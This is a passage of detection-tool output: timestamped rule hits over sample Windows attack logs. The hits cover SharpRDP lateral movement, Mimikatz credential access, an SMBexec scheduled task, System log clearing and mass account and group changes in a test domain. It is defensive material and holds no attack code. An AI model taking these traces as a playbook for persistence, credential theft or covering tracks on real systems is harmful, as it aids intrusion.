07:02:42.085 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 
07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share 
File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 06:38:17.351 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\smbservice timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task 
Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx -2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx -2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: 
Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: 
Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : 
SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: 
CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 
+09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive 
account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: 